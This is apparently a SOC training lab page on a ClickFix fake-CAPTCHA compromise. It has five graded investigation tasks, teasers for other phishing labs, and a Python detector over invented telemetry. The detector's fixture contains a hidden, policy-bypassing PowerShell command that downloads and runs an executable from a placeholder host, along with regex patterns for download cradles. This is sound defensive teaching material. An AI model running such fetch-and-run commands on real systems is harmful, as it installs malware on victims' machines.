
ClickFix: The Fake CAPTCHA Trap
The ClickFix social engineering technique uses dialog boxes containing fake error messages or verification prompts to trick victims into copying, pasting, and running malicious content themselves, so the browser never downloads a file it could block. In this scenario, a user was targeted with a 'Verify You Are Human' CAPTCHA check that led to a significant endpoint compromise. You will analyze the 'paste-and-run' execution chain, investigate PowerShell activity initiated via the Windows Run dialog, and identify the deployment of an information stealer.
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Task 1: The ClickFix Trap (5 points)
Before investigating the telemetry, understand how the attacker got their command to run. ClickFix never delivers a file the browser can block, so what is the delivery mechanism the victim is tricked into using? Name the Windows component that carries the attacker's command from the fake CAPTCHA page into the Run dialog.
Task 2: Pinpoint the Loaded Malicious Library (10 points)
You understand the ClickFix lure; now move to the endpoint. After the PowerShell command ran, the XDR file monitor on corp-wks-102 captured a burst of file activity, and one of those files is the malicious library that regasm.exe loaded into memory. Most entries are normal Windows and Office noise. Which file is the attacker's library?
Task 3: Trace the Payload Download to its Source IP (10 points)
You have the malicious library; now find where it came from. The ClickFix PowerShell command pulled l6E.exe down from an external host before regasm.exe ever touched it. A domain name alone is not enough for a firewall block or for a hunt across other hosts; you need the IP it resolved to. Review the SIEM network logs from corp-wks-102 and identify the server that delivered the payload.
Task 4: Unmask the Command-and-Control Destination (10 points)
You know how the malware arrived and what it loaded. Now find where the stolen data went. After cleanuploader.exe read Anita's Chrome credential store, it opened an outbound channel that tries to look like normal Microsoft cloud traffic. Use the XDR process tree to confirm which process is exfiltrating, then work the firewall logs to expose the true destination behind the disguise.
Task 5: Containment and Lessons Learned (5 points)
You have reconstructed the entire ClickFix chain: lure, execution, the loaded library, the payload source, and the live C2 channel. The workstation is still online, still talking to the attacker, and carries a persistence key that will relaunch the malware. Review the summary and the persistence finding, then make the call: of the five containment actions offered, which one should you take first?
5 tasks · 40 points total
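The five tasks above walk a single chain: a Run-dialog PowerShell cradle, a download, a LOLBin (regasm.exe) loading a library, and an exfiltration channel hiding behind a Microsoft-looking hostname. The following is an added example, not code or data from the scenario, that encodes the same hunting logic over constructed telemetry. The process tree, file names, PIDs, hostnames (cdn-assets.example) and IPs (203.0.113.x, 198.51.100.x documentation ranges) are all assumptions made for illustration; the order of the chain (explorer.exe, powershell.exe, l6E.exe, regasm.exe, cleanuploader.exe) is likewise assumed. The C2 check uses a DNS-vs-connection mismatch: a connection whose TLS SNI claims a name the host resolved, but whose destination IP is not one of that name's answers, is the "disguised as Microsoft cloud traffic" pattern Task 4 describes.

```python
"""Added example: a small detector for a ClickFix paste-and-run chain.

All telemetry below is constructed for illustration; hostnames, IPs, PIDs,
paths and file names are assumptions, not data from the scenario's logs.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed process-creation events (Sysmon EID 1 / EDR style), one workstation.
PROCESS_EVENTS = [
    {"pid": 1304, "ppid": 900,  "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5216, "ppid": 1304, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://cdn-assets.example/l6E.exe '
                '-OutFile $env:TEMP\\l6E.exe; & $env:TEMP\\l6E.exe"'},
    {"pid": 5300, "ppid": 5216, "image": r"C:\Users\anita\AppData\Local\Temp\l6E.exe", "cmdline": "l6E.exe"},
    {"pid": 5344, "ppid": 5300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe /U C:\Users\anita\AppData\Local\Temp\upd.dll"},
    {"pid": 5402, "ppid": 5344, "image": r"C:\Users\anita\AppData\Roaming\cleanuploader.exe",
     "cmdline": "cleanuploader.exe"},
    # Benign noise: OneDrive started from explorer, and regasm.exe run by a developer's build.
    {"pid": 2210, "ppid": 1304, "image": r"C:\Users\anita\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "cmdline": "OneDrive.exe /background"},
    {"pid": 3001, "ppid": 2900, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe C:\src\MyLib\bin\Release\MyLib.dll /codebase"},
]
# Constructed DNS answers seen on the host (the graph.microsoft.com answer is invented, not real).
DNS_EVENTS = [
    {"query": "cdn-assets.example", "answers": ["203.0.113.45"]},
    {"query": "graph.microsoft.com", "answers": ["198.51.100.10"]},
]
# Constructed firewall / network events with the TLS SNI each connection presented.
NET_EVENTS = [
    {"pid": 5216, "dst_ip": "203.0.113.45", "dst_port": 443, "sni": "cdn-assets.example"},
    {"pid": 2210, "dst_ip": "198.51.100.10", "dst_port": 443, "sni": "graph.microsoft.com"},
    {"pid": 5402, "dst_ip": "203.0.113.77", "dst_port": 443, "sni": "graph.microsoft.com"},
]

CRADLE_RE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
                       r"curl|certutil|bitsadmin)\b", re.I)
EVASION_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b|-ep\s+bypass|-nop\b)", re.I)
URL_RE = re.compile(r"https?://[^\s\"';]+", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
LOLBINS = {"regasm.exe", "regsvcs.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "msbuild.exe",
           "installutil.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestry(by_pid, pid):
    """Follow ppid links upward; returns the events from pid to the highest visible ancestor."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_paste_and_run(events):
    """Shells launched under explorer.exe (the Run dialog's parent) whose command line has both a
    download cradle and a window-hiding / policy-bypass switch: the pasted ClickFix command."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if (basename(e["image"]) in SHELLS and parent and basename(parent["image"]) == "explorer.exe"
                and CRADLE_RE.search(e["cmdline"]) and EVASION_RE.search(e["cmdline"])):
            hits.append(e["pid"])
    return hits

def descendants(events, root_pids):
    """All pids whose ancestry passes through one of root_pids (roots included)."""
    by_pid = {e["pid"]: e for e in events}
    roots = set(root_pids)
    return {e["pid"] for e in events
            if e["pid"] in roots or any(a["pid"] in roots for a in ancestry(by_pid, e["ppid"]))}

def find_proxy_execution(events, root_pids):
    """LOLBins such as regasm.exe that descend from a paste-and-run shell; the developer's
    regasm.exe with an unrelated parent is left alone."""
    suspects = descendants(events, root_pids)
    return [e["pid"] for e in events if basename(e["image"]) in LOLBINS and e["pid"] in suspects]

def resolved_map(dns_events):
    resolved = defaultdict(set)
    for d in dns_events:
        resolved[d["query"].lower()].update(d["answers"])
    return resolved

def payload_sources(events, dns_events, root_pids):
    """Hosts named in the cradle's URL, joined to the IPs this host's DNS log resolved them to."""
    resolved, by_pid = resolved_map(dns_events), {e["pid"]: e for e in events}
    return {urlparse(url).hostname: sorted(resolved.get(urlparse(url).hostname.lower(), ()))
            for pid in root_pids for url in URL_RE.findall(by_pid[pid]["cmdline"])}

def find_disguised_c2(net_events, dns_events, suspect_pids):
    """Connections from suspect pids whose SNI is a name the host resolved, but whose destination
    IP is not among that name's answers: a fake-SNI / fronting disguise."""
    resolved = resolved_map(dns_events)
    return [{"pid": n["pid"], "claimed": n["sni"].lower(), "dst_ip": n["dst_ip"]}
            for n in net_events
            if n["pid"] in suspect_pids and n["sni"].lower() in resolved
            and n["dst_ip"] not in resolved[n["sni"].lower()]]

def investigate(events, dns_events, net_events):
    roots = find_paste_and_run(events)
    return {"paste_and_run": roots,
            "proxy_execution": find_proxy_execution(events, roots),
            "payload_sources": payload_sources(events, dns_events, roots),
            "c2": find_disguised_c2(net_events, dns_events, descendants(events, roots))}

if __name__ == "__main__":
    import json
    print(json.dumps(investigate(PROCESS_EVENTS, DNS_EVENTS, NET_EVENTS), indent=2))
```

Scoping the SNI-mismatch check to the suspect process tree is deliberate: CDN rotation means a legitimate client can legitimately connect to an IP its last DNS answer did not list, so the mismatch is a strong signal only once a process is already tied to the paste-and-run chain.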
Ideal for newcomers to SOC operations. Guided investigation with clear indicators.
Prerequisites
- No prior experience required
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
More Operations
Credential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.
MFA Fatigue: The Notification Flood
In this guided walkthrough, you will step into the shoes of a SOC analyst investigating a modern identity-based attack. The threat landscape in 2026 has shifted: adversaries are no longer just 'breaking in'—they are logging in. You will analyze real-time identity signals, correlate disparate log sources across a hybrid cloud environment, and identify the markers of an MFA fatigue attack used by the FlowerStorm phishing kit. This scenario highlights the critical importance of behavioral analysis over simple IOC matching in an era of malware-free intrusions and compromised human identities.